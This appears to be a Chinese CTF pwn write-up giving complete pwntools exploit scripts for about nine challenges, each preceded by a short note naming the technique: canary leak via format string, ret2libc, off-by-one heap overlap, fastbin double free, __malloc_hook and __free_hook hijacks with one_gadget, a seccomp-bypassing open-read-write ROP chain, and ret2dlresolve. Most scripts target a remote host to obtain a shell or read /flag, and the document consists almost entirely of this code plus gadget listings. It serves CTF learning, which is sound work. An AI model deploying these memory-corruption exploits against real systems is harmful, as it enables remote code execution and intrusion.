全栈✌太多辣
按照附件编号:
attachment-11:(makewishes)
伪随机+canary保护的ret2text
exp:
from pwn import *
from ctypes import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])
io=remote("59.110.164.72",10001)
# io=process("./makewishes")
cs=cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
# gdb.attach(io)
# pause()
io.recvuntil(b"first wish\n")
payload=cyclic(0xe)+p64(0)
io.send(payload)
cs.srand(0)
io.recvuntil(b"number!\n")
io.sendline(str(cs.rand()%9+1))
io.recvuntil(b"second wish!\n")
payload=b"%11$p"
io.sendline(payload)
canary=int(io.recv(18),16)
print("canary: "+hex(canary))
cs.srand(0)
io.recvuntil(b"number!\n")
io.sendline(str(cs.rand()%9+1))
io.recvuntil(b"final wish!\n")
payload=cyclic(0x28)+p64(canary)+p64(0)+p64(0x4011d6)
io.send(payload)
io.interactive()
attachment-12:(Login)
签到题,ret2libc
exp:
from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])
io=remote("59.110.164.72",10000)
# io=process("./Login")
elf=ELF("./Login")
libc=ELF("./libc-2.23.so")
pop_rdi_ret=0x4008c3
io.recvuntil(b"tip: ")
libc_base=int(io.recv(14),16)-0x3c48e0
print("libc_base: "+hex(libc_base))
# gdb.attach(io)
# pause()
sys_addr=libc_base+libc.sym[b"system"]
str_bin_sh=libc_base+next(libc.search(b"/bin/sh"))
io.recvuntil(b"username:\n")
payload=cyclic(0x1c)+p32(0x15CC15CC)
io.send(payload)
io.recvuntil(b"password:\n")
payload=cyclic(0x28)+p64(pop_rdi_ret)+p64(str_bin_sh)+p64(sys_addr)
io.sendline(payload)
io.interactive()
# Gadgets information
# ============================================================
# 0x00000000004008bc : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x00000000004008be : pop r13 ; pop r14 ; pop r15 ; ret
# 0x00000000004008c0 : pop r14 ; pop r15 ; ret
# 0x00000000004008c2 : pop r15 ; ret
# 0x00000000004008bb : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x00000000004008bf : pop rbp ; pop r14 ; pop r15 ; ret
# 0x0000000000400680 : pop rbp ; ret
# 0x00000000004008c3 : pop rdi ; ret
# 0x00000000004008c1 : pop rsi ; pop r15 ; ret
# 0x00000000004008bd : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000400599 : ret
# Unique gadgets found: 11
attachment-13:(usage_of_pen)
被这道题前面的比较函数恶心道了,得上网查书法知识拼拼音然后用0补齐
剩下的就是ret2libc
from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])
# io=process("./usage_of_pen")
io=remote("59.110.164.72",10002)
elf=ELF("./usage_of_pen")
libc=ELF("./libc-2.23.so")
leave_ret=0x400942
pop_rdi=0x400c53
func_addr=0x400b0f
read_t1=0x40092B
puts_got=elf.got[b"puts"]
puts_plt=elf.plt[b"puts"]
# gdb.attach(io)
# pause()
io.recvuntil(b"!\n")
# payload=b"dunbi000"
# payload=payload.ljust(40,b"+")
# payload+=b"nvfeng00"
# payload=payload.ljust(72,b"+")
payload=b"dunbi000cuobi000yufeng00dunfeng0cunfeng0nvfeng00yuefeng0anfeng00jiebi000"
io.send(payload)
io.recvuntil(b"space\n")
payload=cyclic(0x28)+p64(func_addr)
io.send(payload)
payload=cyclic(0x28)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(func_addr)
io.send(payload)
leak_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-libc.sym[b"puts"]
print("leak_addr: "+hex(leak_addr))
sys_addr=leak_addr+libc.sym[b"system"]
str_bin_sh=leak_addr+next(libc.search(b"/bin/sh"))
payload=cyclic(0x28)+p64(pop_rdi)+p64(str_bin_sh)+p64(sys_addr)
io.send(payload)
io.interactive()
# Gadgets information
# ============================================================
# 0x0000000000400942 : leave ; ret
# 0x0000000000400c4c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000400c4e : pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000400c50 : pop r14 ; pop r15 ; ret
# 0x0000000000400c52 : pop r15 ; ret
# 0x0000000000400c4b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000400c4f : pop rbp ; pop r14 ; pop r15 ; ret
# 0x0000000000400800 : pop rbp ; ret
# 0x0000000000400c53 : pop rdi ; ret
# 0x0000000000400c51 : pop rsi ; pop r15 ; ret
# 0x0000000000400c4d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x00000000004006c1 : ret
# 0x0000000000400a16 : ret 0x1474
# 0x00000000004009b2 : ret 0x8b48
# Unique gadgets found: 14
attachment-14: (your_character)
edit有off by one打堆块重叠,控制堆块最后打one_gadget
from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])
io=process("./your_character")
elf=ELF("./your_character")
libc=ELF("./libc-2.23.so")
# io.recvuntil(b"Your choice :")
# io.sendline(b"2")
# io.sendlineafter(b"character: \n",b"a")
io.recvuntil(b"Your choice :")
io.sendline(b"1")
def add(n,cc):
io.sendlineafter(b"Your choice :",b"1")
io.sendlineafter(b"Damage of skill : ",str(n))
io.sendafter(b"introduction of skill:",cc)
def extend(i,n):
io.sendlineafter(b"Your choice :",b"2")
io.sendlineafter(b"Index :",str(i))
io.sendlineafter(b"Damage of skill : ",str(n))
def edit(n,cc):
io.sendlineafter(b"Your choice :",b"3")
io.sendlineafter(b"Index :",str(n))
io.sendafter(b"introduction of skill : ",cc)
def show(n):
io.sendlineafter(b"Your choice :",b"4")
io.sendlineafter(b"Index :",str(n))
def delete(n):
io.sendlineafter(b"Your choice :",b"5")
io.sendlineafter(b"Index :",str(n))
gdb.attach(io)
pause()
add(0x80,b"aaa") #0
add(0x18,b"bbb") #1
add(0x18,b"ccc") #2
add(0x18,b"ddd") #3
edit(1,b"a"*0x18+p64(0x61))
delete(2)
add(0x50,b"www") #2
edit(2,b"A"*0x8)
show(2)
io.recvuntil(b"A"*0x8)
leak_addr=u64(io.recvline()[:-1].ljust(8,b"\x00"))
print("leak_addr: "+hex(leak_addr))
delete(0)
heap_addr=leak_addr-0xf0
edit(2,p64(0)*3+p64(0x21)+p64(0)+p64(heap_addr))
show(2)
libc_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-0x58-0x3C4B20
print("libc_addr: "+hex(libc_addr))
one_gadget=[0x45226,0x4527a,0xf03a4,0xf1247]
shell=libc_addr+one_gadget[0]
edit(2,b'A'*0xf0+p64(heap_addr+0x10))
io.interactive()
# 0x45226 execve("/bin/sh", rsp+0x30, environ)
# constraints:
# rax == NULL
# 0x4527a execve("/bin/sh", rsp+0x30, environ)
# constraints:
# [rsp+0x30] == NULL
# 0xf03a4 execve("/bin/sh", rsp+0x50, environ)
# constraints:
# [rsp+0x50] == NULL
# 0xf1247 execve("/bin/sh", rsp+0x70, environ)
# constraints:
# [rsp+0x70] == NULL
attachment-32:(double)
aba double free控制堆块到指定位置然后控制指定位置数据
本题注意布栈细节
f12是个好习惯,最开始没找到/bin/sh字串
exp:
from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])
io=remote("59.110.164.72",10021)
# io=process("./attachment-32")
elf=ELF("./attachment-32")
shell=0x4008f7
pop_rdi_ret=0x400cb3
def add(n,s):
io.recv()
io.sendline(b"1")
io.recv()
io.sendline(str(n))
io.recv()
io.sendline(str(s))
def edit(n,s):
io.recv()
io.sendline(b"4")
io.recv()
io.sendline(str(n))
io.recv()
io.sendline(s)
def delete(n):
io.recv()
io.sendline(b"2")
io.recv()
io.sendline(str(n))
def ex():
io.recv()
io.sendline(b"5")
add(0,0x68)
add(1,0x68)
add(2,0x10)
delete(1)
delete(0)
delete(1)
add(3,0x68)
edit(3,p64(0x6021d8))
# gdb.attach(io)
# pause()
add(4,0x68)
add(5,0x68)
add(6,0x68)
edit(6,p64(0x15CC15CC)+p64(0x400cd8)+p64(0)*6+p64(0xCC51CC51)) #/bin/sh
ex()
io.recvuntil(b"reward: ")
leak_addr=int(io.recv(14),16)
print("leak_addr: "+hex(leak_addr))
leak_addr=leak_addr+0xf0
low=(leak_addr)&0xff-0x8
print("low: "+hex(low))
high=(leak_addr&0xffff)>>8
print("high: "+hex(high))
payload=cyclic(0x20)+p8(low)+p8(high)
payload=payload.ljust(0xf0,b"a")+p64(0x6021f8)+p64(0x4008f7) #system
io.recvuntil(b"say:\n")
io.send(payload)
io.interactive()
# Gadgets information
# ============================================================
# 0x0000000000400cac : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000400cae : pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000400cb0 : pop r14 ; pop r15 ; ret
# 0x0000000000400cb2 : pop r15 ; ret
# 0x0000000000400cab : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000400caf : pop rbp ; pop r14 ; pop r15 ; ret
# 0x00000000004007f0 : pop rbp ; ret
# 0x0000000000400cb3 : pop rdi ; ret
# 0x0000000000400cb1 : pop rsi ; pop r15 ; ret
# 0x0000000000400cad : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x00000000004006b1 : ret
# 0x0000000000400c40 : ret 0xfffc
# Unique gadgets found: 12
attachment-36:(chef)
edit存在溢出写,可以off by one构造堆块重叠
然后就是简单的劫持__malloc_hook打one_gadget
exp:
from pwn import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])
io=remote("59.110.164.72", 10031)
# io=process("./chef")
elf=ELF("./chef")
libc=ELF("./libc-2.23.so")
def menu():
io.sendlineafter(b"Your choice:",b"4")
def show():
io.sendlineafter(b"Your choice:",b"1")
def add(n,cc):
io.sendlineafter(b"Your choice:",b"2")
io.sendlineafter(b"price of food:",str(n))
io.sendafter(b"name of food:",cc)
def edit(n,s,cc):
io.sendlineafter(b"Your choice:",b"3")
io.sendlineafter(b"index of food:",str(n))
io.sendlineafter(b"price of food :",str(s))
io.sendafter(b"name of food:",cc)
def delete(n):
io.sendlineafter(b"Your choice:",b"4")
io.sendlineafter(b"index of food:",str(n))
menu()
# gdb.attach(io)
# pause()
add(0x18,b"aaa") #0
add(0x40,b"bbb") #1
add(0x30,b"ccc") #2
add(0x10,b"eee") #3
show()
edit(0,0x19,p64(0)*3+p64(0x91))
delete(1)
add(0x40,b"b"*7)
show()
leak_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-0x68-libc.sym[b"__malloc_hook"]
print("leak_addr: "+hex(leak_addr))
malloc_hook=leak_addr+libc.sym[b"__malloc_hook"]
one_gadget=[0x45226,0x4527a,0xf03a4,0xf1247]
shell=leak_addr+one_gadget[1]
add(0x60,b"qqq") #4
add(0x60,b"www") #5
add(0x60,b"eee") #6
delete(4)
payload=cyclic(0x10)+p64(0)+p64(0x71)+p64(malloc_hook-0x23)
edit(3,len(payload),payload)
add(0x60,p64(shell))
add(0x60,cyclic(0x13)+p64(shell))
delete(5)
io.sendlineafter(b"Your choice:",b"2")
io.sendlineafter(b"price of food:",b"96")
# io.sendlineafter(b"name of food:",b"1")
io.interactive()
# 0x45226 execve("/bin/sh", rsp+0x30, environ)
# constraints:
# rax == NULL
# 0x4527a execve("/bin/sh", rsp+0x30, environ)
# constraints:
# [rsp+0x30] == NULL
# 0xf03a4 execve("/bin/sh", rsp+0x50, environ)
# constraints:
# [rsp+0x50] == NULL
# 0xf1247 execve("/bin/sh", rsp+0x70, environ)
# constraints:
# [rsp+0x70] == NULL
attachment-37: (Trapped)
开启沙盒禁用execve(),需要构造orw rop链
同时也开启canary保护,可以利用格式化字符串泄露
注意额外构造read在bss段读入'/flag'字串给orw做参数用
exp:
#傻逼本地开调试输入必出锅
from pwn import*
context(log_level='debug',arch='amd64',os='linux',terminal=['tmux','splitw','-h'])
# io=process("./Trapped")
io=remote("59.110.164.72", 10066)
elf=ELF("./Trapped")
libc=ELF("./libc-2.23.so")
pop_rdi_ret=0x400a23
pop_rsi_r15=0x400a21
io.recvuntil(b"larger box\n")
payload=b"aaaa%9$p"
io.send(payload)
io.recvuntil(b"aaaa")
canary=int(io.recv(18),16)
print("canary: "+hex(canary))
io.recvuntil(b"larger box\n")
payload=b"99"
io.send(payload)
io.recvuntil(b"about\n")
payload=cyclic(0x28)+p64(canary)+p64(0)+p64(pop_rdi_ret)+p64(elf.got[b"puts"])+p64(elf.plt[b"puts"])+p64(0x400777)
io.send(payload)
leak_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-libc.sym[b"puts"]
print("leak_addr: "+hex(leak_addr))
pop_rdx_ret=0x01b92+leak_addr
pop_rsi_ret=0x202f8+leak_addr
pop3_ret=0x400a1e
bss_addr=0x601100
bss_len=0x1000
para=0x7
open_addr=libc.sym[b"open"]+leak_addr
write_addr=libc.sym[b"write"]+leak_addr
read_addr=libc.sym[b"read"]+leak_addr
mprotect=libc.sym[b"mprotect"]+leak_addr
# gdb.attach(io)
# pause()
io.recvuntil(b"about\n")
payload=cyclic(0x28)+p64(canary)+p64(0)+p64(pop_rdi_ret)+p64(0)+p64(pop_rsi_ret)+p64(bss_addr)+p64(elf.sym[b"read"])+p64(0x400777)
io.send(payload)
payload=b"/flag"
# payload=payload.ljust(0x100,b"\x00")
io.send(payload)
io.recvuntil(b"about\n")
payload=cyclic(0x28)+p64(canary)+p64(0)
#o
payload+=p64(pop_rdi_ret)+p64(bss_addr)+p64(pop_rsi_ret)+p64(0)+p64(open_addr)
#r
payload+=p64(pop_rdi_ret)+p64(3)+p64(pop_rsi_ret)+p64(bss_addr+0x160)+p64(pop_rdx_ret)+p64(0x50)+p64(read_addr)
#w
payload+=p64(pop_rdi_ret)+p64(1)+p64(pop_rsi_ret)+p64(bss_addr+0x160)+p64(pop_rdx_ret)+p64(0x50)+p64(write_addr)
io.send(payload)
io.recv()
io.interactive()
# Gadgets information
# ============================================================
# 0x0000000000400a1c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000400a1e : pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000400a20 : pop r14 ; pop r15 ; ret
# 0x0000000000400a22 : pop r15 ; ret
# 0x0000000000400a1b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000400a1f : pop rbp ; pop r14 ; pop r15 ; ret
# 0x00000000004006f8 : pop rbp ; ret
# 0x0000000000400a23 : pop rdi ; ret
# 0x0000000000400a21 : pop rsi ; pop r15 ; ret
# 0x0000000000400a1d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x000000000040060e : ret
# 0x0000000000400682 : ret 0x2009
# 0x0000000000400960 : ret 0x2be
# 0x000000000040062b : jmp 0x400610
# 0x0000000000400775 : jmp 0x400700
# 0x00000000004008f5 : jmp 0x4008f8
# 0x000000000040099d : jmp 0x4009ad
# 0x0000000000400c0b : jmp qword ptr [rbp]
# 0x00000000004008a9 : jmp qword ptr [rsi - 0x39]
# 0x00000000004006f1 : jmp rax
# Unique gadgets found: 13
attachment-38:(忘了叫啥了,dlresolve的题)
可以用pwntools的自动化工具打通
佩服手动构造的orz
from pwn import *
context(log_level='debug',arch='x86',terminal=['tmux','splitw','-h'])
io=remote("59.110.164.72", 10067)
# io=process("./attachment-38")
context.binary=elf=ELF("./attachment-38")
rop=ROP("./attachment-38")
bss_addr=0x804A01C
leave_ret=0x8048378
pop_ebp_ret=0x80484ab
pop3_ret=0x80484a9
dlresolve=Ret2dlresolvePayload(elf, symbol='system', args=['/bin/sh\x00'])
rop.read(0,dlresolve.data_addr)
rop.ret2dlresolve(dlresolve)
# gdb.attach(io)
# pause()
log.info(rop.dump())
payload=flat({76:rop.chain(),256:dlresolve.payload})
io.send(payload)
# read_plt=elf.plt[b"read"]
# payload=cyclic(0x48)+p32(bss_addr)+p32(read_plt)+p32(pop3_ret)+p32(0)+p32(bss_addr)+p32(0x100)
io.interactive()
# Gadgets information
# ============================================================
# 0x08048378 : leave ; ret
# 0x080484ab : pop ebp ; ret
# 0x080484a8 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
# 0x080482c9 : pop ebx ; ret
# 0x080484aa : pop edi ; pop ebp ; ret
# 0x080484a9 : pop esi ; pop edi ; pop ebp ; ret
# 0x080482b2 : ret
# 0x0804838e : ret 0xeac1
# 0x08048568 : ret 0xfffe
# Unique gadgets found: 9
attachment-39:(SIMS)
UAF的tcachebin attack,劫持__free_hook打one_gadget
最后多次edit是我找不到chunk下标了,孩子不懂摁着玩的
exp:
from pwn import *
from ctypes import *
context(log_level='debug',arch='amd64',terminal=['tmux','splitw','-h'])
io=remote("59.110.164.72",10085)
# io=process("./SIMS")
elf=ELF("./SIMS")
libc=ELF("./libc-2.27.so")
cs=cdll.LoadLibrary("./libc-2.27.so")
io.recvuntil(b"password:\n")
rd=cs.rand()
print("rd: "+str(rd))
# for i in range(1,36569646000):
# if rd^i==0x15cc15cc:
# ps=i
# break
# else:
# continue
ps=2118602923
print("ans: "+hex(ps^rd))
io.sendline(str(ps))
def add(n):
io.sendlineafter(b"one!\n",b"1")
io.sendlineafter(b"Stu:\n",str(n))
def delete(n):
io.sendlineafter(b"one!\n",b"2")
io.sendlineafter(b"Index:\n",str(n))
def edit(n,cc):
io.sendlineafter(b"one!\n",b"3")
io.sendlineafter(b"Index:\n",str(n))
io.sendafter(b"Content of Stu:\n",cc)
def show(n):
io.sendlineafter(b"one!\n",b"4")
io.sendlineafter(b"Index:\n",str(n))
# gdb.attach(io)
# pause()
for i in range(8):
add(0x90)
edit(i,b"/bin/sh")
add(0x90) #8
edit(8,"/bin/sh")
for i in range(8):
delete(i)
show(7)
leak_addr=u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))-0x70-libc.sym[b"__malloc_hook"]
print("leak_addr: "+hex(leak_addr))
malloc_hook=leak_addr+libc.sym[b"__malloc_hook"]
free_hook=leak_addr+libc.sym[b"__free_hook"]
realloc=leak_addr+libc.sym[b"__libc_realloc"]
sys_addr=leak_addr+libc.sym[b"system"]
one_gadget=[0x4f2a5,0x4f302,0x10a2fc]
shell=leak_addr+one_gadget[1]
# for i in range(0,6):
# add(0x90)
edit(6,p64(free_hook))
add(0x90) #9
add(0x90) #10
edit(0,p64(sys_addr))
edit(1,p64(sys_addr))
edit(2,p64(sys_addr))
edit(3,p64(sys_addr))
edit(4,p64(sys_addr))
edit(5,p64(sys_addr))
edit(6,p64(sys_addr))
edit(7,p64(sys_addr))
# edit(8,p64(sys_addr))
# add(0x90) #9
# add(0x90) #10
# add(0x90) #11
delete(8)
io.interactive()
# 0x4f2a5 execve("/bin/sh", rsp+0x40, environ)
# constraints:
# rsp & 0xf == 0
# rcx == NULL
# 0x4f302 execve("/bin/sh", rsp+0x40, environ)
# constraints:
# [rsp+0x40] == NULL
# 0x10a2fc execve("/bin/sh", rsp+0x70, environ)
# constraints:
# [rsp+0x70] == NULL